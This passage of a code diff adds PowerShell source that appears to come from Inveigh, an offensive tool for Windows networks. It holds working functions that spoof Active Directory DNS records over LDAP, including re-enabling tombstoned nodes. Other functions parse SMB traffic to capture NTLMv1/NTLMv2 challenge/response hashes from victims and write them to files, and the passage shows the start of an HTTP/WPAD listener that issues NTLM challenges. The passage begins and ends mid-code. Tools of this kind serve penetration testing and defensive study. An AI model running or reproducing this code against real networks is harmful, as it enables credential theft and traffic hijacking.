-format s)] ADIDNS node $Node added to $Zone") > $null; + + if($inveigh.ADIDNS -eq 'Combo') + { + $inveigh.ADIDNS_table.$Node = "1" + } + + } + catch + { + $success = $false + $error_message = $_.Exception.Message + $error_message = $error_message -replace "`n","" + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null + + if($inveigh.ADIDNS -eq 'Combo') + { + $inveigh.ADIDNS_table.$Node = "0" + } + + } + + if($directory_entry.Path) + { + $directory_entry.Close() + } + + return $success + } + + function Get-ADIDNSNodeTombstoned + { + + [CmdletBinding()] + param + ( + [parameter(Mandatory=$false)][String]$DistinguishedName, + [parameter(Mandatory=$false)][String]$Domain, + [parameter(Mandatory=$false)][String]$DomainController, + [parameter(Mandatory=$true)][String]$Node, + [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones", + [parameter(Mandatory=$false)][String]$Zone, + [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential + ) + + $distinguished_name = "DC=$Node,DC=$Zone,CN=MicrosoftDNS,DC=$Partition" + $DC_array = $Domain.Split(".") + + foreach($DC in $DC_array) + { + $distinguished_name += ",DC=$DC" + } + + if($Credential) + { + $directory_entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$DomainController/$distinguished_name",$Credential.UserName,$Credential.GetNetworkCredential().Password) + } + else + { + $directory_entry = New-Object System.DirectoryServices.DirectoryEntry "LDAP://$DomainController/$distinguished_name" + } + + try + { + $dnsTombstoned = $directory_entry.InvokeGet('dnsTombstoned') + $dnsRecord = $directory_entry.InvokeGet('dnsRecord') + } + catch + { + + if($_.Exception.Message -notlike '*Exception calling "InvokeGet" with "1" argument(s): "The specified directory service attribute or value does not exist.*' -and + $_.Exception.Message -notlike '*The following exception occurred while retrieving member "InvokeGet": "The specified directory service attribute or value does not exist.*') + { + $error_message = $_.Exception.Message + $error_message = $error_message -replace "`n","" + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null + } + + } + + if($directory_entry.Path) + { + $directory_entry.Close() + } + + $node_tombstoned = $false + + if($dnsTombstoned -and $dnsRecord) + { + + if($dnsRecord[0].GetType().name -eq [Byte]) + { + + if($dnsRecord.Count -ge 32 -and $dnsRecord[2] -eq 0) + { + $node_tombstoned = $true + } + + } + + } + + return $node_tombstoned + } + + function New-ADIDNSNode + { + [CmdletBinding()] + param + ( + [parameter(Mandatory=$false)][String]$Data, + [parameter(Mandatory=$false)][String]$DistinguishedName, + [parameter(Mandatory=$false)][String]$Domain, + [parameter(Mandatory=$false)][String]$DomainController, + [parameter(Mandatory=$false)][String]$Forest, + [parameter(Mandatory=$true)][String]$Node, + [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones", + [parameter(Mandatory=$false)][String]$Type, + [parameter(Mandatory=$false)][String]$Zone, + [parameter(Mandatory=$false)][Int]$TTL, + [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential + ) + + $null = [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") + + $distinguished_name = "DC=$Node,DC=$Zone,CN=MicrosoftDNS,DC=$Partition" + $DC_array = $Domain.Split(".") + + foreach($DC in $DC_array) + { + $distinguished_name += ",DC=$DC" + } + + [Byte[]]$DNSRecord = New-DNSRecordArray -Data $Data -DomainController $DomainController -TTL $TTL -Zone $Zone + $identifier = New-Object System.DirectoryServices.Protocols.LdapDirectoryIdentifier($DomainController,389) + + if($Credential) + { + $connection = New-Object System.DirectoryServices.Protocols.LdapConnection($identifier,$Credential.GetNetworkCredential()) + } + else + { + $connection = New-Object System.DirectoryServices.Protocols.LdapConnection($identifier) + } + + $object_category = "CN=Dns-Node,CN=Schema,CN=Configuration" + $forest_array = $Forest.Split(".") + + foreach($DC in $forest_array) + { + $object_category += ",DC=$DC" + } + + try + { + $connection.SessionOptions.Sealing = $true + $connection.SessionOptions.Signing = $true + $connection.Bind() + $request = New-Object -TypeName System.DirectoryServices.Protocols.AddRequest + $request.DistinguishedName = $distinguished_name + $request.Attributes.Add((New-Object "System.DirectoryServices.Protocols.DirectoryAttribute" -ArgumentList "objectClass",@("top","dnsNode"))) > $null + $request.Attributes.Add((New-Object "System.DirectoryServices.Protocols.DirectoryAttribute" -ArgumentList "objectCategory",$object_category)) > $null + $request.Attributes.Add((New-Object "System.DirectoryServices.Protocols.DirectoryAttribute" -ArgumentList "dnsRecord",$DNSRecord)) > $null + $request.Attributes.Add((New-Object "System.DirectoryServices.Protocols.DirectoryAttribute" -ArgumentList "dNSTombstoned","TRUE")) > $null + $connection.SendRequest($request) > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] ADIDNS node $Node added to $Zone") > $null + $output = $true + + if($inveigh.ADIDNS -eq 'Combo') + { + $inveigh.ADIDNS_table.$Node = "1" + } + + } + catch + { + $error_message = $_.Exception.Message + $error_message = $error_message -replace "`n","" + $output = $false + + if($_.Exception.Message -ne 'Exception calling "SendRequest" with "1" argument(s): "The object exists."') + { + $inveigh.ADIDNS = $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null + } + + if($inveigh.ADIDNS -eq 'Combo') + { + $inveigh.ADIDNS_table.$Node = "0" + } + + } + + return $output + } + + function New-SOASerialNumberArray + { + + [CmdletBinding()] + param + ( + [parameter(Mandatory=$false)][String]$DomainController, + [parameter(Mandatory=$false)][String]$Zone + ) + + $Zone = $Zone.ToLower() + + function Convert-DataToUInt16($Field) + { + [Array]::Reverse($Field) + return [System.BitConverter]::ToUInt16($Field,0) + } + + function ConvertFrom-PacketOrderedDictionary($OrderedDictionary) + { + + foreach($field in $OrderedDictionary.Values) + { + $byte_array += $field + } + + return $byte_array + } + + function New-RandomByteArray + { + param([Int]$Length,[Int]$Minimum=1,[Int]$Maximum=255) + + [String]$random = [String](1..$Length | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum $Minimum -Maximum $Maximum)}) + [Byte[]]$random = $random.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + + return $random + } + + function New-DNSNameArray + { + param([String]$Name) + + $character_array = $Name.ToCharArray() + [Array]$index_array = 0..($character_array.Count - 1) | Where-Object {$character_array[$_] -eq '.'} + + if($index_array.Count -gt 0) + { + + $name_start = 0 + + foreach($index in $index_array) + { + $name_end = $index - $name_start + [Byte[]]$name_array += $name_end + [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start,$name_end)) + $name_start = $index + 1 + } + + [Byte[]]$name_array += ($Name.Length - $name_start) + [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start)) + } + else + { + [Byte[]]$name_array = $Name.Length + [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start)) + } + + return $name_array + } + + function New-PacketDNSSOAQuery + { + param([String]$Name) + + [Byte[]]$type = 0x00,0x06 + [Byte[]]$name = (New-DNSNameArray $Name) + 0x00 + [Byte[]]$length = [System.BitConverter]::GetBytes($Name.Count + 16)[1,0] + [Byte[]]$transaction_ID = New-RandomByteArray 2 + $DNSQuery = New-Object System.Collections.Specialized.OrderedDictionary + $DNSQuery.Add("Length",$length) + $DNSQuery.Add("TransactionID",$transaction_ID) + $DNSQuery.Add("Flags",[Byte[]](0x01,0x00)) + $DNSQuery.Add("Questions",[Byte[]](0x00,0x01)) + $DNSQuery.Add("AnswerRRs",[Byte[]](0x00,0x00)) + $DNSQuery.Add("AuthorityRRs",[Byte[]](0x00,0x00)) + $DNSQuery.Add("AdditionalRRs",[Byte[]](0x00,0x00)) + $DNSQuery.Add("Queries_Name",$name) + $DNSQuery.Add("Queries_Type",$type) + $DNSQuery.Add("Queries_Class",[Byte[]](0x00,0x01)) + + return $DNSQuery + } + + $DNS_client = New-Object System.Net.Sockets.TCPClient + $DNS_client.Client.ReceiveTimeout = 3000 + + try + { + $DNS_client.Connect($DomainController,"53") + $DNS_client_stream = $DNS_client.GetStream() + $DNS_client_receive = New-Object System.Byte[] 2048 + $packet_DNSQuery = New-PacketDNSSOAQuery $Zone + [Byte[]]$DNS_client_send = ConvertFrom-PacketOrderedDictionary $packet_DNSQuery + $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null + $DNS_client_stream.Flush() + $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null + $DNS_client.Close() + $DNS_client_stream.Close() + + if($DNS_client_receive[9] -eq 0) + { + $inveigh.output_queue.Add("[-] $Zone SOA record not found") > $null + } + else + { + $DNS_reply_converted = [System.BitConverter]::ToString($DNS_client_receive) + $DNS_reply_converted = $DNS_reply_converted -replace "-","" + $SOA_answer_index = $DNS_reply_converted.IndexOf("C00C00060001") + $SOA_answer_index = $SOA_answer_index / 2 + $SOA_length = $DNS_client_receive[($SOA_answer_index + 10)..($SOA_answer_index + 11)] + $SOA_length = Convert-DataToUInt16 $SOA_length + [Byte[]]$SOA_serial_current_array = $DNS_client_receive[($SOA_answer_index + $SOA_length - 8)..($SOA_answer_index + $SOA_length - 5)] + $SOA_serial_current = [System.BitConverter]::ToUInt32($SOA_serial_current_array[3..0],0) + 1 + [Byte[]]$SOA_serial_number_array = [System.BitConverter]::GetBytes($SOA_serial_current)[0..3] + } + + } + catch + { + $inveigh.output_queue.Add("[-] $DomainController did not respond on TCP port 53") > $null + } + + return [Byte[]]$SOA_serial_number_array + } + + function New-DNSRecordArray + { + [CmdletBinding()] + [OutputType([Byte[]])] + param + ( + [parameter(Mandatory=$false)][String]$Data, + [parameter(Mandatory=$false)][String]$DomainController, + [parameter(Mandatory=$false)][ValidateSet("A","AAAA","CNAME","DNAME","MX","NS","PTR","SRV","TXT")][String]$Type = "A", + [parameter(Mandatory=$false)][String]$Zone, + [parameter(Mandatory=$false)][Int]$Preference, + [parameter(Mandatory=$false)][Int]$Priority, + [parameter(Mandatory=$false)][Int]$Weight, + [parameter(Mandatory=$false)][Int]$Port, + [parameter(Mandatory=$false)][Int]$TTL = 600, + [parameter(Mandatory=$false)][Int32]$SOASerialNumber, + [parameter(Mandatory=$false)][Switch]$Static, + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter + ) + + $SOASerialNumberArray = New-SOASerialNumberArray -DomainController $DomainController -Zone $Zone + + function New-DNSNameArray + { + param([String]$Name) + + $character_array = $Name.ToCharArray() + [Array]$index_array = 0..($character_array.Count - 1) | Where-Object {$character_array[$_] -eq '.'} + + if($index_array.Count -gt 0) + { + + $name_start = 0 + + foreach($index in $index_array) + { + $name_end = $index - $name_start + [Byte[]]$name_array += $name_end + [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start,$name_end)) + $name_start = $index + 1 + } + + [Byte[]]$name_array += ($Name.Length - $name_start) + [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start)) + } + else + { + [Byte[]]$name_array = $Name.Length + [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start)) + } + + return $name_array + } + + switch ($Type) + { + + 'A' + { + [Byte[]]$DNS_type = 0x01,0x00 + [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes(($Data.Split(".")).Count))[0..1] + [Byte[]]$DNS_data += ([System.Net.IPAddress][String]([System.Net.IPAddress]$Data)).GetAddressBytes() + } + + 'AAAA' + { + [Byte[]]$DNS_type = 0x1c,0x00 + [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes(($Data -replace ":","").Length / 2))[0..1] + [Byte[]]$DNS_data += ([System.Net.IPAddress][String]([System.Net.IPAddress]$Data)).GetAddressBytes() + } + + 'CNAME' + { + [Byte[]]$DNS_type = 0x05,0x00 + [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 4))[0..1] + [Byte[]]$DNS_data = $Data.Length + 2 + $DNS_data += ($Data.Split(".")).Count + $DNS_data += New-DNSNameArray $Data + $DNS_data += 0x00 + } + + 'DNAME' + { + [Byte[]]$DNS_type = 0x27,0x00 + [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 4))[0..1] + [Byte[]]$DNS_data = $Data.Length + 2 + $DNS_data += ($Data.Split(".")).Count + $DNS_data += New-DNSNameArray $Data + $DNS_data += 0x00 + } + + 'MX' + { + [Byte[]]$DNS_type = 0x0f,0x00 + [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 6))[0..1] + [Byte[]]$DNS_data = [System.Bitconverter]::GetBytes($Preference)[1,0] + $DNS_data += $Data.Length + 2 + $DNS_data += ($Data.Split(".")).Count + $DNS_data += New-DNSNameArray $Data + $DNS_data += 0x00 + } + + 'NS' + { + [Byte[]]$DNS_type = 0x02,0x00 + [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 4))[0..1] + [Byte[]]$DNS_data = $Data.Length + 2 + $DNS_data += ($Data.Split(".")).Count + $DNS_data += New-DNSNameArray $Data + $DNS_data += 0x00 + } + + 'PTR' + { + [Byte[]]$DNS_type = 0x0c,0x00 + [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 4))[0..1] + [Byte[]]$DNS_data = $Data.Length + 2 + $DNS_data += ($Data.Split(".")).Count + $DNS_data += New-DNSNameArray $Data + $DNS_data += 0x00 + } + + 'SRV' + { + [Byte[]]$DNS_type = 0x21,0x00 + [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 10))[0..1] + [Byte[]]$DNS_data = [System.Bitconverter]::GetBytes($Priority)[1,0] + $DNS_data += [System.Bitconverter]::GetBytes($Weight)[1,0] + $DNS_data += [System.Bitconverter]::GetBytes($Port)[1,0] + $DNS_data += $Data.Length + 2 + $DNS_data += ($Data.Split(".")).Count + $DNS_data += New-DNSNameArray $Data + $DNS_data += 0x00 + } + + 'TXT' + { + [Byte[]]$DNS_type = 0x10,0x00 + [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 1))[0..1] + [Byte[]]$DNS_data = $Data.Length + $DNS_data += [System.Text.Encoding]::UTF8.GetBytes($Data) + } + + } + + [Byte[]]$DNS_TTL = [System.BitConverter]::GetBytes($TTL) + [Byte[]]$DNS_record = $DNS_length + + $DNS_type + + 0x05,0xF0,0x00,0x00 + + $SOASerialNumberArray[0..3] + + $DNS_TTL[3..0] + + 0x00,0x00,0x00,0x00 + + if($Static) + { + $DNS_record += 0x00,0x00,0x00,0x00 + } + else + { + $timestamp = [Int64](([Datetime]::UtcNow)-(Get-Date "1/1/1601")).TotalHours + $timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($timestamp)) + $timestamp = $timestamp.Split("-") | ForEach-Object{[System.Convert]::ToInt16($_,16)} + $timestamp = $timestamp[0..3] + $DNS_record += $timestamp + } + + $DNS_record += $DNS_data + + return ,$DNS_record + } + + function Invoke-ADIDNSSpoofer + { + [CmdletBinding()] + param + ( + [parameter(Mandatory=$false)][String]$Data, + [parameter(Mandatory=$false)][String]$Domain, + [parameter(Mandatory=$false)][String]$DomainController, + [parameter(Mandatory=$false)][String]$Forest, + [parameter(Mandatory=$true)][String]$Node, + [parameter(Mandatory=$false)]$Partition, + [parameter(Mandatory=$false)][String]$Zone, + [parameter(Mandatory=$false)][Int]$TTL, + [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential + ) + + try + { + $node_added = New-ADIDNSNode -Credential $Credential -Data $Data -Domain $Domain -DomainController $DomainController -Forest $Forest -Node $Node -Partition $Partition -TTL $TTL -Zone $Zone + + if($inveigh.ADIDNS -and !$node_added) + { + $node_tombstoned = Get-ADIDNSNodeTombstoned -Credential $Credential -Domain $Domain -DomainController $DomainController -Node $Node -Partition $Partition -Zone $Zone + + if($node_tombstoned) + { + Enable-ADIDNSNode -Credential $Credential -Data $Data -Domain $Domain -DomainController $DomainController -Node $Node -Partition $Partition -TTL $TTL -Zone $Zone + } + + } + + } + catch + { + $error_message = $_.Exception.Message + $error_message = $error_message -replace "`n","" + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] ADIDNS spoofer disabled due to error") > $null + $inveigh.ADIDNS = $null + } + + } + + function Invoke-ADIDNSCheck + { + [CmdletBinding()] + param + ( + [parameter(Mandatory=$false)][Array]$Ignore, + [parameter(Mandatory=$false)][String]$Data, + [parameter(Mandatory=$false)][String]$Domain, + [parameter(Mandatory=$false)][String]$DomainController, + [parameter(Mandatory=$false)][String]$Forest, + [parameter(Mandatory=$false)]$Partition, + [parameter(Mandatory=$false)][String]$Zone, + [parameter(Mandatory=$false)][Int]$Threshold, + [parameter(Mandatory=$false)][Int]$TTL, + [parameter(Mandatory=$false)]$RequestTable, + [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential + ) + + Start-Sleep -S 1 + + foreach($request in $RequestTable.Keys) + { + + if(($RequestTable.$request | Sort-Object -Unique).Count -gt $Threshold) + { + + if(!$inveigh.ADIDNS_table.ContainsKey($request)) + { + $inveigh.ADIDNS_table.Add($request,"") + } + + if($Ignore -NotContains $request -and !$inveigh.ADIDNS_table.$request) + { + Invoke-ADIDNSSpoofer -Credential $Credential -Data $Data -Domain $Domain -DomainController $DomainController -Forest $Forest -Node $request -Partition $Partition -TTL $TTL -Zone $Zone + } + elseif($Ignore -Contains $request) + { + + if(!$inveigh.ADIDNS_table.$request) + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] ADIDNS combo attack ignored $request") > $null + $inveigh.ADIDNS_table.$request = 3 + } + + } + + } + + Start-Sleep -m 10 + } + + } + +} + +# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response +$SMB_NTLM_functions_scriptblock = +{ + + function Get-SMBConnection + { + param ([Byte[]]$Payload,[String]$IP,[String]$SourceIP,[String]$SourcePort,[String]$Port) + + $payload_converted = [System.BitConverter]::ToString($Payload) + $payload_converted = $payload_converted -replace "-","" + $session = "$SourceIP`:$SourcePort" + $SMB_index = $payload_converted.IndexOf("FF534D42") + + if(!$inveigh.SMB_session_table.ContainsKey($Session) -and $SMB_index -gt 0 -and $payload_converted.SubString(($SMB_index + 8),2) -eq "72" -and ($IP -ne $SourceIP)) + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB($Port) negotiation request detected from $Session") > $null + } + + if(!$inveigh.SMB_session_table.ContainsKey($Session) -and $SMB_index -gt 0) + { + $inveigh.SMB_session_table.Add($Session,"") + } + + $SMB_index = $payload_converted.IndexOf("FE534D42") + + if(!$inveigh.SMB_session_table.ContainsKey($Session) -and $SMB_index -gt 0 -and $payload_converted.SubString(($SMB_index + 24),4) -eq "0000" -and ($IP -ne $SourceIP)) + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB($Port) negotiation request detected from $Session") > $null + } + + if(!$inveigh.SMB_session_table.ContainsKey($Session) -and $SMB_index -gt 0) + { + $inveigh.SMB_session_table.Add($Session,"") + } + + } + + function Get-SMBNTLMChallenge + { + param ([Byte[]]$Payload) + + $payload_converted = [System.BitConverter]::ToString($Payload) + $payload_converted = $payload_converted -replace "-","" + $NTLM_index = $payload_converted.IndexOf("4E544C4D53535000") + + if($payload_converted.SubString(($NTLM_index + 16),8) -eq "02000000") + { + $NTLM_challenge = $payload_converted.SubString(($NTLM_index + 48),16) + } + + $target_name_length = Get-UInt16DataLength (($NTLM_index + 24) / 2) $Payload + $negotiate_flags = [System.Convert]::ToInt16(($payload_converted.SubString(($NTLM_index + 44),2)),16) + $negotiate_flags = [Convert]::ToString($negotiate_flags,2) + $target_info_flag = $negotiate_flags.SubString(0,1) + + if($target_info_flag -eq 1) + { + $target_info_index = ($NTLM_index + 80) / 2 + $target_info_index = $target_info_index + $target_name_length + 16 + $target_info_item_type = $Payload[$target_info_index] + $i = 0 + + while($target_info_item_type -ne 0 -and $i -lt 10) + { + $target_info_item_length = Get-UInt16DataLength ($target_info_index + 2) $Payload + + switch($target_info_item_type) + { + + 2 + { + $netBIOS_domain_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $Payload + } + + 3 + { + $DNS_computer_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $Payload + } + + 4 + { + $DNS_domain_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $Payload + } + + } + + $target_info_index = $target_info_index + $target_info_item_length + 4 + $target_info_item_type = $Payload[$target_info_index] + $i++ + } + + if($netBIOS_domain_name -and $DNS_domain_name -and !$inveigh.domain_mapping_table.$netBIOS_domain_name -and $netBIOS_domain_name -ne $DNS_domain_name) + { + $inveigh.domain_mapping_table.Add($netBIOS_domain_name,$DNS_domain_name) + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] Domain mapping added for $netBIOS_domain_name to $DNS_domain_name") > $null + } + + for($i = 0;$i -lt $inveigh.enumerate.Count;$i++) + { + + if($inveigh.enumerate[$i].IP -eq $target -and !$inveigh.enumerate[$i].Hostname) + { + $inveigh.enumerate[$i].Hostname = $DNS_computer_name + $inveigh.enumerate[$i]."DNS Domain" = $DNS_domain_name + $inveigh.enumerate[$i]."netBIOS Domain" = $netBIOS_domain_name + break + } + + } + + } + + return $NTLM_challenge + } + + function Get-SMBNTLMResponse + { + param ([Byte[]]$Payload,[String]$Session) + + $payload_converted = [System.BitConverter]::ToString($Payload) + $payload_converted = $payload_converted -replace "-","" + $NTLMSSP_hex_offset = $payload_converted.IndexOf("4E544C4D53535000") + + if($NTLMSSP_hex_offset -gt 0 -and $payload_converted.SubString(($NTLMSSP_hex_offset + 16),8) -eq "03000000") + { + $NTLMSSP_offset = $NTLMSSP_hex_offset / 2 + $LM_length = Get-UInt16DataLength ($NTLMSSP_offset + 12) $Payload + $LM_offset = Get-UInt32DataLength ($NTLMSSP_offset + 16) $Payload + $LM_response = [System.BitConverter]::ToString($Payload[($NTLMSSP_offset + $LM_offset)..($NTLMSSP_offset + $LM_offset + $LM_length - 1)]) -replace "-","" + $NTLM_length = Get-UInt16DataLength ($NTLMSSP_offset + 20) $Payload + $NTLM_offset = Get-UInt32DataLength ($NTLMSSP_offset + 24) $Payload + $NTLM_response = [System.BitConverter]::ToString($Payload[($NTLMSSP_offset + $NTLM_offset)..($NTLMSSP_offset + $NTLM_offset + $NTLM_length - 1)]) -replace "-","" + $domain_length = Get-UInt16DataLength ($NTLMSSP_offset + 28) $Payload + $domain_offset = Get-UInt32DataLength ($NTLMSSP_offset + 32) $Payload + $NTLM_domain_string = Convert-DataToString ($NTLMSSP_offset + $domain_offset) $domain_length $Payload + $user_length = Get-UInt16DataLength ($NTLMSSP_offset + 36) $Payload + $user_offset = Get-UInt32DataLength ($NTLMSSP_offset + 40) $Payload + $NTLM_user_string = Convert-DataToString ($NTLMSSP_offset + $user_offset) $user_length $Payload + $host_length = Get-UInt16DataLength ($NTLMSSP_offset + 44) $Payload + $host_offset = Get-UInt32DataLength ($NTLMSSP_offset + 48) $Payload + $NTLM_host_string = Convert-DataToString ($NTLMSSP_offset + $host_offset) $host_length $Payload + $NTLM_challenge = $inveigh.SMB_session_table.$Session + + if($NTLM_length -gt 24) + { + $NTLMv2_response = $NTLM_response.Insert(32,':') + $NTLMv2_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLMv2_response + + if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$')))) + { + $inveigh.NTLMv2_list.Add($NTLMv2_hash) > $null + + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")) + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv2_hash") > $null + } + else + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string [not unique]") > $null + } + + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))) + { + $inveigh.NTLMv2_file_queue.Add($NTLMv2_hash) > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null + } + + if($inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string") + { + $inveigh.NTLMv2_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string") > $null + } + + if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP) + { + $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) > $null + } + + } + + } + elseif($NTLM_length -eq 24) + { + $NTLMv1_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $LM_response + ":" + $NTLM_response + ":" + $NTLM_challenge + + if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$')))) + { + $inveigh.NTLMv1_list.Add($NTLMv1_hash) > $null + + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")) + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv1_hash") > $null + } + else + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string [not unique]") > $null + } + + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))) + { + $inveigh.NTLMv1_file_queue.Add($NTLMv1_hash) > $null + $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) > $null + } + + if($inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string") + { + $inveigh.NTLMv1_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string") > $null + } + + if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP) + { + $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) > $null + } + + } + + } + + Invoke-SessionUpdate $NTLM_domain_string $NTLM_user_string $NTLM_host_string $source_IP + } + + } + +} + +# HTTP Server ScriptBlock - HTTP/HTTPS/Proxy listener +$HTTP_scriptblock = +{ + param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse, + $HTTPS_listener,$NBNSBruteForcePause,$Proxy,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADAuthIgnore,$WPADResponse) + + function Get-NTLMChallengeBase64 + { + param ([String]$Challenge,[Bool]$NTLMESS,[String]$ClientIPAddress,[Int]$ClientPort) + + $HTTP_timestamp = Get-Date + $HTTP_timestamp = $HTTP_timestamp.ToFileTime() + $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp)) + $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + + if($Challenge) + { + $HTTP_challenge = $Challenge + $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') + $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + } + else + { + $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $HTTP_challenge = $HTTP_challenge_bytes -replace ' ', '' + $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + } + + if($NTLMESS) + { + $HTTP_NTLM_negotiation_flags = 0x05,0x82,0x89,0x0a + } + else + { + $HTTP_NTLM_negotiation_flags = 0x05,0x82,0x81,0x0a + } + + $inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null + $hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.computer_name) + $netBIOS_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.netBIOS_domain) + $DNS_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.DNS_domain) + $DNS_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.DNS_computer_name) + $hostname_length = [System.BitConverter]::GetBytes($hostname_bytes.Length)[0,1] + $netBIOS_domain_length = [System.BitConverter]::GetBytes($netBIOS_domain_bytes.Length)[0,1] + $DNS_domain_length = [System.BitConverter]::GetBytes($DNS_domain_bytes.Length)[0,1] + $DNS_hostname_length = [System.BitConverter]::GetBytes($DNS_hostname_bytes.Length)[0,1] + $target_length = [System.BitConverter]::GetBytes($hostname_bytes.Length + $netBIOS_domain_bytes.Length + $DNS_domain_bytes.Length + 